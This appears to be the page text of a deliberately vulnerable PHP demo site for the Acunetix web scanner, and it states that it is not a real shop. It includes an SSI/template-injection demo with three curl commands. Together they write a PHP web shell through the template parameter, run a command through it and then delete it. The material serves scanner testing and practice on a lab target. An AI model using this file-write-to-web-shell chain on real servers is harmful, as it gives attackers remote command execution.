Acunetix Art

TEST and Demonstration site for Acunetix Web Vulnerability Scanner
WARNING: This is not a real shop. This is an example PHP application which is intentionally vulnerable to web attacks. It is intended to help you test security scanners and practice manual hacking skills.
Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.

Server-Side Includes (SSI) Demo

SSI / Template Injection

Template: Content: ">

Test SSTI via File Write + Include

# Step 1: Create PHP file via template injection
curl "http://localhost/ssi.php?template=shell.php&content=%3C%3Fphp%20system(%24_GET%5B'cmd'%5D)%3B%20%3F%3E"

# Step 2: Access created shell
curl "http://localhost/templates/shell.php?cmd=id"

# Step 3: Clean up
curl "http://localhost/ssi.php?template=shell.php&content="